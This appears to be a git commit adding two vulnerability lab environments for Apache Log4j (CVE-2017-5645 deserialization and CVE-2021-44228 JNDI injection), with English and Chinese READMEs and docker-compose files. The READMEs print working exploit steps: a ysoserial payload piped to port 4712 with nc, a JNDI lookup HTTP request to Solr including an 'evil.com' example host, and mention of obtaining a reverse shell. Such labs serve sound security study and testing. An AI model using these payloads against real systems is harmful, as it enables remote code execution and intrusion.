first commit

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
--- a/log4j/CVE-2017-5645/1.png
+++ b/log4j/CVE-2017-5645/1.png
--- a/log4j/CVE-2017-5645/2.png
+++ b/log4j/CVE-2017-5645/2.png
--- a/log4j/CVE-2017-5645/README.md
+++ b/log4j/CVE-2017-5645/README.md
@@ -0,0 +1,38 @@
+# Apache Log4j TCP Server Deserialization Remote Code Execution (CVE-2017-5645)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache Log4j is a logging library for Java that supports starting remote logging servers. A security vulnerability exists in versions 2.x before 2.8.2 of Apache Log4j TCP Server. Attackers can exploit this vulnerability to execute arbitrary code.
+
+References:
+
+- https://issues.apache.org/jira/browse/LOG4J2-1863
+- https://github.com/pimps/CVE-2017-5645
+
+## Environment Setup
+
+Execute the following command to start a Log4j 2.8.1 TCP server:
+
+```
+docker compose up -d
+```
+
+After the environment starts, a TCP server will be opened on port 4712.
+
+Note: Besides using Vulhub's docker image to set up the environment, we can directly start this TCP server from the command line after downloading the log4j jar files: `java -cp "log4j-api-2.8.1.jar:log4j-core-2.8.1.jar:jcommander-1.72.jar" org.apache.logging.log4j.core.net.server.TcpSocketServer`, without needing to use Vulhub or write code.
+
+## Vulnerability Reproduction
+
+We use ysoserial to generate a payload, then send it directly to the `your-ip:4712` port.
+
+```
+java -jar ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712
+```
+
+Then execute `docker compose exec log4j bash` to enter the container, and you can see that /tmp/success has been successfully created:
+
+![](1.png)
+
+Execute a [reverse shell command](http://www.jackson-t.ca/runtime-exec-payloads.html) to successfully get a shell:
+
+![](2.png)
--- a/log4j/CVE-2017-5645/README.zh-cn.md
+++ b/log4j/CVE-2017-5645/README.zh-cn.md
@@ -0,0 +1,36 @@
+# Apache Log4j TCP Server 反序列化命令执行漏洞（CVE-2017-5645）
+
+Apache Log4j是一个用于Java的日志记录库，其支持启动远程日志服务器。Apache Log4j TCP Server 2.8.2之前的2.x版本中存在反序列化漏洞，攻击者可利用该漏洞执行任意代码。
+
+参考链接：
+
+- https://issues.apache.org/jira/browse/LOG4J2-1863
+- https://github.com/pimps/CVE-2017-5645
+
+## 漏洞环境
+
+执行如下命令启动漏洞环境：
+
+```
+docker compose up -d
+```
+
+环境启动后，将在4712端口开启一个TCPServer。
+
+说一下，除了使用vulhub的docker镜像搭建环境外，我们下载了log4j的jar文件后可以直接在命令行启动这个TCPServer：`java -cp "log4j-api-2.8.1.jar:log4j-core-2.8.1.jar:jcommander-1.72.jar" org.apache.logging.log4j.core.net.server.TcpSocketServer`，无需使用vulhub和编写代码。
+
+## 漏洞复现
+
+我们使用ysoserial生成payload，然后直接发送给`your-ip:4712`端口即可。
+
+```
+java -jar ysoserial-master-v0.0.5-gb617b7b-16.jar CommonsCollections5 "touch /tmp/success" | nc your-ip 4712
+```
+
+然后执行`docker compose exec log4j bash`进入容器，可见 /tmp/success 已成功创建：
+
+![](1.png)
+
+执行[反弹shell的命令](http://www.jackson-t.ca/runtime-exec-payloads.html)，成功弹回shell：
+
+![](2.png)
--- a/log4j/CVE-2017-5645/docker-compose.yml
+++ b/log4j/CVE-2017-5645/docker-compose.yml
@@ -0,0 +1,5 @@
+services:
+ log4j:
+   image: vulhub/log4j:2.8.1
+   ports:
+    - "4712:4712"
--- a/log4j/CVE-2021-44228/1.png
+++ b/log4j/CVE-2021-44228/1.png
--- a/log4j/CVE-2021-44228/2.png
+++ b/log4j/CVE-2021-44228/2.png
--- a/log4j/CVE-2021-44228/3.png
+++ b/log4j/CVE-2021-44228/3.png
--- a/log4j/CVE-2021-44228/README.md
+++ b/log4j/CVE-2021-44228/README.md
@@ -0,0 +1,55 @@
+# Apache Log4j2 lookup feature JNDI injection (CVE-2021-44228)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache Log4j 2 is an upgrade to Log4j that provides significant improvements over its predecessor, Log4j 1.x, and provides many of the improvements available in Logback while fixing some inherent problems in Logback's architecture.
+
+On Dec 2021, a 0-day exploit in the Apache Log4j2 was discovered. Log4j’s JNDI support has not restricted what names could be resolved. Some protocols like `rmi:` and `ldap:` are unsafe or can allow remote code execution.
+
+References:
+
+- https://logging.apache.org/log4j/2.x/security.html
+- https://www.lunasec.io/docs/blog/log4j-zero-day/
+- https://xz.aliyun.com/t/10649
+
+## Vulnerability Environment
+
+Apache Log4j2 is not a certain web service, it is just a third-party library, so we can use a application that depend on Log4j2 to demonstrate how to exploit this vulnerability.
+
+Execute following command to start a Apache Solr 8.11.0, which use Log4j 2.14.1:
+
+```
+docker compose up -d
+```
+
+After server start, browse `http://your-ip:8983` to see the admin portal of Apache Solr.
+
+## Exploit
+
+Simply, put the payload `${jndi:dns://${sys:java.version}.example.com}` as the admin action that can trigger the JNDI query.
+
+```
+GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1
+Host: your-ip:8983
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
+Connection: close
+
+
+```
+
+Query will be shown at the DNS log:
+
+![](1.png)
+
+Because the target JDK version is below 8u191, we can use `rmi://` or `ldap://` to run the Java bytecode directly.
+
+For vulnerability exploitation, you can use the [Java Chains](https://github.com/vulhub/java-chains). First, visit the [Quick Start](https://java-chains.vulhub.org/docs/guide) page to set up Java Chains. Then, follow the [JNDI Basic Exploitation Guide](https://java-chains.vulhub.org/docs/module/jndi#jndibasicpayload) to configure the command `touch /tmp/success` and generate a JNDI LDAP URL Payload. Finally, replace the payload in the previous HTTP request to successfully exploit the vulnerability.
+
+![](2.png)
+
+As you can see, `touch /tmp/success` is succesful executed:
+
+![](3.png)
--- a/log4j/CVE-2021-44228/README.zh-cn.md
+++ b/log4j/CVE-2021-44228/README.zh-cn.md
@@ -0,0 +1,53 @@
+# Apache Log4j2 lookup JNDI 注入漏洞（CVE-2021-44228）
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Apache Log4j 2 是Java语言的日志处理套件，使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入，执行任意代码。
+
+参考链接：
+
+- https://logging.apache.org/log4j/2.x/security.html
+- https://www.lunasec.io/docs/blog/log4j-zero-day/
+- https://xz.aliyun.com/t/10649
+
+## 漏洞环境
+
+Apache Log4j2 不是一个特定的Web服务，而仅仅是一个第三方库，我们可以通过找到一些使用了这个库的应用来复现这个漏洞，比如Apache Solr。
+
+执行如下命令启动一个Apache Solr 8.11.0，其依赖了Log4j 2.14.1：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:8983`即可查看到Apache Solr的后台页面。
+
+## 漏洞复现
+
+`${jndi:dns://${sys:java.version}.example.com}`是利用JNDI发送DNS请求的Payload，我们将其作为管理员接口的action参数值发送如下数据包：
+
+```
+GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1
+Host: your-ip:8983
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
+Connection: close
+
+
+```
+
+我们可以在DNS日志平台收到相关日志，显示出当前Java版本：
+
+![](1.png)
+
+因为目标JDK版本低于8u191，所以我们可以使用`rmi://`或`ldap://`来直接执行Java字节码。
+
+你可以使用 [Java Chains](https://github.com/vulhub/java-chains) 来进行漏洞复现。首先，访问 [快速入手](https://java-chains.vulhub.org/zh/docs/guide) 启动 Java Chains，然后参考 [JNDI Basic 利用指南](https://java-chains.vulhub.org/zh/docs/module/jndi#jndibasicpayload) 设置要执行的命令为 `touch /tmp/success` 并生成 JNDI LDAP URL Payload，最后将其替换进上面的数据包中来利用漏洞：
+
+![](2.png)
+
+利用完毕后，可见`touch /tmp/success`已经成功被执行：
+
+![](3.png)
--- a/log4j/CVE-2021-44228/docker-compose.yml
+++ b/log4j/CVE-2021-44228/docker-compose.yml
@@ -0,0 +1,7 @@
+version: '2'
+services:
+ solr:
+   image: vulhub/solr:8.11.0
+   ports:
+    - "8983:8983"
+    - "5005:5005"